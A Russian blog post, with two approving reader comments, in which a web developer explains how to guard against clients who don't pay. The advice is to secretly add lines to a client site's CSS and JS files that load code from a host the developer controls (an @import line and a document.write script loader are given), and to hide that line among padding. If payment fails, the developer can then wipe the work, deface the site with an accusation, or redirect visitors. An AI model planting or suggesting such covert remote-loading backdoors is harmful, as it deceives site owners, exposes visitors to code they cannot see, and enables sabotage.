Создание сайта: как защищаться от неуплаты

Попросили меня поработать над сайтом. В ходе работы, на второй или третий день, я увидел что есть клон сайта с надписью в контактах "Владельцы данной компании являются мошенниками".

Я по whois узнал кто владелец домена и связался с ним, чтоб прояснить ситуацию. Он рассказал что с заказчиком был оговорен объем работ, исполнитель (он же владелец домена) ее честно выполнил, после чего заказчик накидал еще столько же задач и закончилось тем, что была получена лишь половина от оговоренной суммы, аргументируя тем, что выполнена половина работы, хотя исполнитель наоборот ее перевыполнил. Меня заказчик тоже пытался нагрузить дополнительными задачами, потому естественное желание было как-то перестраховаться: чтоб я мог удалить результат своей работы даже если сменят все пароли или попытаются восстановить мои труды из бекапов. Вопрос был лишь в том, как сделать это легко, красиво и без заливания каких-либо шеллов.

Ответ не застал себя долго ждать: первое что пришло в голову это в js и css-файлах прописать загрузку внешних css и js-файлов, которые могут храниться в dropbox'e. Большая часть работы была связана с редактированием css-файлов для правильного отображения сайта во всех браузерах (на мобильных в том числе), плюс пришлось по колдовать над одним js-файлом, именно эти файлы я и решил держать у себя. В результате наиболее значимая работа хранилась у меня в локальной папке. Оказалось что так даже удобней работать: не нужно пользоваться ftp-менеджерами или веб-мордой для того чтоб туда-сюда гонять обновленные файлы, достаточно лишь отредактировать файл в notepad++, нажать ctrl+s и через пару секунд на сайте виден результат изменений.

При этом такой метод "защиты" почти не заметен: даже если глянуть на исходный код страницы, то там перечислены стандартные css/js-файлы с локальным (для сайта) путем, и очень мала вероятность того, что кто-либо полезет анализировать их содержимое. При этом эти стандартные-файлы можно набить бесполезным содержимым, чтоб затерялась строка, которая отвечает за подгрузку внешнего файла. И если вдруг заказчик окажется не добропорядочным - можно не только легко удалить свою работу, но и сделать чтоб отображалась надпись "Владелец сайта - не добропорядочный человек. Вебмастер был обманут, работа была не оплачена". Или вообще прописать JavaScript-редирект. После получения оплаты естественно нужно заменить подгрузку внешних файлов на их содержимое.

А теперь о том, как это сделать:

Внедрение внешнего файла css - пропишите в одном из файлов css вот такую строчку:

@import url('http://example.org.ua/example.css');

Внедрение внешнего файла js - в файле js пропишите вот это:

function staticLoadScript(url)
{
document.write('<script src="', url, '" type="text/JavaScript"><\/script>');
}
staticLoadScript("http://example.org.ua/example.js");

Ну а самый верный способ "обезопаситься" - это не связываться с подозрительными заказчиками или брать деньги вперед.

Понравилось? =) Поделись с друзьями:

Обсуждение записи “Создание сайта: как защищаться от неуплаты”

  1. Вячеслав Балашов says:

    Очень полезно и актуально, спасибо за статью. Пока таких неприятных случаев не было, и я как-то не задумывался об этом… но теперь знаю как подстраховаться.

  2. elimS (elims.org.ua) says:

    Пользуйтесь на здоровье) Кстати так даже действительно удобней редактировать css-файлы)

Обсудить